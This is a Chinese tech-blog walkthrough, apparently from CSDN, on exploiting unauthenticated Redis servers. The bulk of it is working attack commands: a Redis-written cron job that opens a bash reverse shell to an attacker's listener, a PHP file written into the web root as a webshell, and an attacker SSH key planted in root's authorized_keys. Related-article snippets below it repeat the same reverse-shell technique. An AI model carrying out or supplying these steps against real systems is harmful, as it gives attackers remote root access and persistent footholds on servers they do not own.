redis 未授权访问配合计划任务反弹shell

已于 2023-06-03 15:13:48 修改
阅读量1.2k 收藏 5
点赞数 2
分类专栏: 数据库提权 文章标签: redis 数据库 缓存
于 2023-05-23 15:56:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65096687/article/details/130828941
版权

redis未授权访问漏洞产生条件:
1.redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网;
2.没有设置密码认证(一般为空),可以免密码远程登录redis服务。

要在kali上下载客户端

对方redis数据库开启后就会直接连接

一共有三种利用方式:

1.利用redis反弹回来一个shell

root@kali:~# redis-cli -h 192.168.85.170
 set x "\n* * * * * bash -i >& /dev/tcp/反弹的ip/7999 0>&1\n"
 config set dir /var/spool/cron/
 config set dbfilename root
 save

然后直接本地开个nc

nc -lvnp 7999


进行接受反弹回来的信息

kali监听

2. 直接写shell

因为这是测试,所以知道对方的目录

config set dir /var/www
config set dbfilename test.php
set x "<?php phpinfo();?>"
save

然后在对方服务器查看一下

webshell已经被写入

3.改公钥免密登录

先本地生成一个密钥

ssh-keygen -t rsa

然后把密钥写入对方服务器

cat 1.txt | redis-cli -h 192.168.85.170 -x set crack

redis客户端登录

config set dir /root/.ssh             放入目录
config set dbfilename authorized_keys  改名
save
quit

 

然后退出,ssh免密登录    ssh -i id_rsa root@192.168.85.170  

 

 

不过是三年五载
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-8-1Redis计划任务反弹shell
qq_45290991的博客
08-01 2207
前段时间忙着毕业,终于现在毕业了,在愉快而紧张地等待毕业前期,我开始了Redis的学习。。。 一、搭建安装配置Redis数据库 我听说在centOS下可以Redis结合计划任务反弹shell成功,Ubuntu貌似不行 ...
利用redis漏洞反弹shell
qq_54713392的博客
04-20 2107
利用redis漏洞反弹shell 攻击机:kali 192.168.32.132 目标机:centos7 192.168.32.144 (1)在目标机centos中安装redis服务器(redis-server) 解压,进入源码目录,然后编译(make、make install) 解压文件:tar -zxvf redis-2.8.17.tar.gz 移动解压文件 执行命令:mv redis-2.8.17 /usr/local/redis 进入到目录下:cd /usr/local/redis 执行ma
从0到1浅析Redis服务器反弹Shell那些事
道阻且长,行则将至。
12-29 1983
本文学习了 Redis 服务的作用,并本地搭建了 Redis 服务,同时介绍了其相关基础使用方法和核心安全配置。然后总结分析了 Redis 授权访问漏洞或弱口令导致 Redis 服务被攻击者操控后,如何进一步通过反弹 Shell 接管服务器。
反弹shell 看这一篇就够了
最新发布
m0_69043895的博客
04-21 1421
在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。SSL协议的优势在于它是与应用层协议独立无关的,高层的应用层协议(例如:HTTP,FTP,TELNET等)能透明地建立于SSL协议之上。SSL协议在应用层协议通信之前就已经完成加密算法、通信密钥的协商及服务器认证工作。在此之后应用层协议所传送的数据都会被加密,从而保证通信的私密性。
网络安全——利用ssrf操作内网redis写入计划任务反弹shell
Demo不是emo的博客
09-17 3327
今天的内容是ssrf漏洞的利用,环境选择的是discuz含有ssrf漏洞的版本,通过该漏洞来写入redis计划任务反弹shell(附带环境安装包)
Redis授权访问反弹shell
Zlirving_的博客
06-17 1991
Redis简介 Redis 是一个高性能的key-value数据库。为了保证效率,数据都是缓存在内存中。redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步   漏洞简介 1、什么是redis授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证,会导致任意
Redis授权访问配合SSH key文件利用详解
09-09
主要给大家介绍了关于Redis授权访问配合SSH key文件利用的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
Redis-Getshell:Redis 授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
05-05
Redis 授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! Webshell SSH crontab
redis授权访问反弹shell
18年3月萌新白帽子
06-26 4546
一、redis的安装1.使用wget命令获取redis的安装包wget http://download.redis.io/releases/redis-4.0.8.tar.gz2.tar –zxvf redis-4.0.8.tar.gz解压改文件然后进入redis-4.0.8这个文件夹   cd redis-4.0.8然后执行make命令由于我们刚刚安装好redis数据库,还创建用户,默认使用的...
记录一次Redis授权getshell几种常见方法
qq_45888826的博客
09-17 3797
记录一次Redis授权getshell几种常见方法
redis反弹shell时kali无法接收回弹的解决方法
qq_41696858的博客
10-13 932
无法接受回谈大概率是bash命令写的不对,那个crontab中间的星号个数是有意义的,不是随便加的,下面贴一下crontab的基本用法 https://www.cnblogs.com/zhoading/p/11572630.html {minute} {hour} {day-of-month} {month} {day-of-week} {full-path-to-shell-script} 如果是要crontab立刻执行的化,前面应该是五个星号,表示任意时刻都可以执行,所以如果回谈不成功,可以利用 cro
SSRF在Redis反弹shell
weixin_34126215的博客
05-27 992
搭个环境怪不容易的,求大佬们放过。。。 参考文献:https://joychou.org/web/phpssrf.htmlhttps://www.anquanke.com/post/id/146417 SSRF概念 SSRF(Server-Side Request Forgery),服务端请求伪造,利用漏...
如何通过redis授权访问漏洞反弹shell
qq_42671480的博客
05-20 1449
如何通过redis授权访问漏洞反弹shell 1.搭建redis服务器和客户端 我用centos作为靶机,用kali作为攻击方来进行实验。 下载,解压,编译: $ wget http://download.redis.io/releases/redis-4.0.10.tar.gz $ tar xzf redis-4.0.10.tar.gz $ mv redis-4.0.10 /usr/loc...
shell脚本实现批量自动redis反弹shell攻击
十月鱼的博客(本博客不再更新,作者迁移至:http://wiki.51centos.com)
04-03 1492
一、shell实现redis反弹shell [root@xingcheng attack]# cat shell_rebound.sh #!/bin/bash ##create by xingcheng ##20180403 ##function 批量redis反弹shell获取系统权限,主要针对没有安全策略的reids服务器和弱口令redis服务器,他们往往使用root账户运行 #ip_...
WebLogic SSRF漏洞攻击内网Redis以及反弹shell
SoulCat
02-08 3312
WebLogic SSRF漏洞攻击内网Redis以及反弹shell 漏洞概述: -通俗的讲weblogci是一种web容器,首先判断redis(内网ip和端口),由于Redis是通过换行符来分隔每条命令,可以通过传入%0a%0d来注入换行符,发送redis命令,将弹shell脚本写入/etc/crontab中(crontab是一个linux一个定时执行事件的一个程序),然后getshell。 基本...
多种姿势反弹shell
Brucetg的博客
08-20 7061
在渗透过程中,在拿到webshell后,如果目标主机是Linux服务器,一般我们都会选择反弹shell以方便后续操作,在此总结下反弹shell的几种姿势。 0x01. Bash反弹 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i &amp;gt;&amp;amp; /dev/tcp/x.x.x.x/port 0&amp;gt;&amp;amp;1 简单解释下: bash ...
Redis授权访问漏洞复现与GETSHELL利用方法汇总(含靶场搭建)
W小哥
09-18 1954
一、漏洞产生原因 redis安装完之后,默认情况下绑定在 0.0.0.0:6379,且没有对登录IP做限制,并且没有设置密码(默认为空)。 二、漏洞危害 攻击者无需认证即可访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行flushall来清空所有数据; 攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件; 最严重的情况,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。 三、靶场搭建 3.1、redis数据库下载安装 访问
Redis授权访问漏洞利用总结
热门推荐
Fly_鹏程万里
07-06 2万+
0x01 redis介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。Redis因配置不当可以授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flusha...
redis授权访问getshell
03-16
Redis授权访问是指Redis服务器的访问控制没有设置好,导致攻击者可以通过Redis的一些命令获取服务器的敏感信息或者执行恶意代码,从而实现getshell的攻击。为了避免这种情况发生,我们需要对Redis服务器进行安全配置,包括设置密码、限制访问IP等措施。同时,也需要及时更新Redis的版本,以防止已知漏洞被攻击利用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值